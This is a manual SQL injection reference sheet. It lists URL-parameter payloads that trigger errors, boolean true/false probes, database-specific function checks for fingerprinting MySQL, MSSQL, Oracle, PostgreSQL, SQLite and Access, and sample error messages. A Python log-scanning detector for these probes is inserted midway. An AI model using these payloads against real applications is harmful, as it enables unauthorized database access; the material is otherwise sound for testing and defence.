💉Recognize the DB for Manual SQL Injection

How to Create Error

  1. ?id=2' ----> Create Error

  2. ?id=2" ----> Create Error

  3. ?id=2'\ ----> Create Error

  4. ?id=2"\ ----> Create Error

  5. ?id=2'/ ----> Create Error

  6. ?id=2"/ ----> Create Error

  7. ?id=2%bf%5c' ----> Create Error

  8. ?id=2%bf%5c" ----> Create Error

----------------------------------------------------------------

How to Use them

  1. ?id=122' ----> Check Error

  2. ?id=122" ----> Check Error

  3. ?id=122 and 1=1 ----> Check True

  4. ?id=122' and 1=0 ----> Check False

  5. ?id=122 and {{Function_Payload}} ----> Check DB Function related to that Database One by One

For that, we put functions specific to one database into our injection. If the output is normal, the function is working, so it belongs to this DB; if we get an error or the page output does not come back as normal, we can understand that the function we are using does not belong to this DB.

----------------------------------------------------------------

To check if the current db is MySQL:


conv('a',16,2)=conv('a',16,2)
connection_id()=connection_id()
crc32('MySQL')=crc32('MySQL')

----------------------------------------------------------------

To check if the current db is MSSQL:


BINARY_CHECKSUM(123)=BINARY_CHECKSUM(123)
@@CONNECTIONS>0
@@CONNECTIONS=@@CONNECTIONS
@@CPU_BUSY=@@CPU_BUSY
USER_ID(1)=USER_ID(1)

----------------------------------------------------------------

To check if the current db is Oracle:


ROWNUM=ROWNUM
RAWTOHEX('AB')=RAWTOHEX('AB')
LNNVL(0=123)

----------------------------------------------------------------

To check if the current db is PostgreSQL:


5::int=5
5::integer=5
pg_client_encoding()=pg_client_encoding()
get_current_ts_config()=get_current_ts_config()
quote_literal(42.5)=quote_literal(42.5)
current_database()=current_database()

----------------------------------------------------------------

To check if the current db is SQLite:


sqlite_version()=sqlite_version()
last_insert_rowid()>1
last_insert_rowid()=last_insert_rowid()

----------------------------------------------------------------

To check if the current db is MSACCESS:


val(cvar(1))=1
IIF(ATN(2)>0,1,0) BETWEEN 2 AND 0
cdbl(1)=cdbl(1)
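
Seen from the defending side, the per-database checks above leave recognisable tokens in request logs. The following is an added example, not part of the original page: it flags those tokens in access-log lines and reports clients that test for several engines one after another. The log format, sample lines, IP addresses and function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Tokens taken from the per-database checks on this page (lowercased, no spaces).
PROBES = {
    "MySQL": ["conv(", "connection_id(", "crc32("],
    "MSSQL": ["binary_checksum(", "@@connections", "@@cpu_busy", "user_id("],
    "Oracle": ["rownum=rownum", "rawtohex(", "lnnvl("],
    "PostgreSQL": ["::int", "pg_client_encoding(", "get_current_ts_config(",
                   "quote_literal(", "current_database("],
    "SQLite": ["sqlite_version(", "last_insert_rowid("],
    "MSAccess": ["cvar(", "cdbl(", "iif(atn("],
}
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD|PUT) (\S+) HTTP/[\d.]+"')

def normalize(raw):
    """Decode twice (double-encoding), lowercase, drop /**/ comments and whitespace."""
    s = unquote_plus(unquote_plus(raw)).lower()
    return re.sub(r"\s+", "", re.sub(r"/\*.*?\*/", "", s))

def classify(line):
    """Sorted DBMS names whose fingerprint tokens appear in the query string."""
    m = REQUEST_RE.search(line)
    if not m or "?" not in m.group(1):
        return []
    query = normalize(m.group(1).split("?", 1)[1])
    return sorted(db for db, toks in PROBES.items() if any(t in query for t in toks))

def sweeps(lines, min_dbs=2):
    """Client IPs that probed for min_dbs or more engines: one-by-one enumeration."""
    seen = {}
    for line in lines:
        hits = classify(line)
        if hits:
            seen.setdefault(line.split()[0], set()).update(hits)
    return {ip: sorted(dbs) for ip, dbs in seen.items() if len(dbs) >= min_dbs}

# Constructed access-log lines (combined log format, documentation IP ranges).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:01 +0000] "GET /item.php?id=122%20and%20conv(%27a%27,16,2)=conv(%27a%27,16,2) HTTP/1.1" 200 512',
    '203.0.113.7 - - [01/Jan/2024:10:00:02 +0000] "GET /item.php?id=122+and+@@CONNECTIONS%3E0 HTTP/1.1" 500 87',
    '203.0.113.7 - - [01/Jan/2024:10:00:03 +0000] "GET /item.php?id=122%2520and%25205::int=5 HTTP/1.1" 500 87',
    '198.51.100.4 - - [01/Jan/2024:10:00:04 +0000] "GET /item.php?id=122 HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    print(sweeps(SAMPLE_LOG))
```

A single hit on one engine can be a false positive; the stronger signal is one client cycling through tokens for several engines against the same parameter.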

----------------------------------------------------------------

The error may not always be a real SQL error; sometimes it is a generic error or a change in the output of the application.

All you have to do is recognise the DB from it.

MySQL Error Style:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1

MSSQL ASPX Error:

Server Error in '/' Application

MSAccess (Apache PHP):

Fatal error: Uncaught exception 'com_exception' with message Source: Microsoft JET Database Engine

MSAccess (IIS ASP):

Microsoft JET Database Engine error '80040e14'

Oracle Error:

ORA-00933: SQL command not properly ended

ODBC Error:

Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)

PostgreSQL Error:

PSQLException: ERROR: unterminated quoted string at or near "'" Position: 1

or

Query failed: ERROR: syntax error at or near "'" at character 56 in /www/site/test.php on line 121.

MS SQL Server Error:

Microsoft SQL Native Client error '80040e14' Unclosed quotation mark after the
